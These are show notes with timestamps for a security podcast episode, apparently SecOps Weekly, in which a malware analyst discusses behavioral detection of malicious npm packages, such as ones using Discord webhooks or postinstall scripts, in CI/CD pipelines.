SHOW NOTES

In this episode of SecOps Weekly, Senior Malware Analyst Tony Lambert joins us live to discuss how to proactively detect malicious NPM packages and supply chain attacks in CICD pipelines using behavioral analytics rather than relying solely on threat intelligence indicators.

The discussion covers the challenges of securing development environments where malicious packages often execute, including developer machines and CICD runners that contain sensitive tokens and secrets. Tony demonstrates malware analysis techniques on real examples, including packages that use Discord web hooks for data exfiltration and post-install scripts for code execution.

The discussion emphasizes moving beyond atomic indicators to create more durable detection analytics by understanding adversary behaviors and generalizing detection patterns. Key topics include latest malware families, the use of tools like TruffleHog for secret discovery, and practical approaches to building resilient detection capabilities using existing telemetry from EDR systems and network logs.

TIMESTAMPS

• 00:00 – Introduction
• 01:14 – Welcome to SecOps Weekly!
• 01:52 – Transforming malicious package analysis into behavioral logic
• 04:10 – Why it matters
• 08:41 – The challenge
• 10:38 – Move from sample analysis to detection logic
• 12:26 – Useful telemetry
• 14:40 – “Teach to fish” methodology
• 15:34 – Detect emerging npm malware faster
• 17:24 – Case study #1: Node contacting Discord webhooks
• 24:31 – Case study #2: Suspicious postinstall execution
• 29:31 – Key takeaways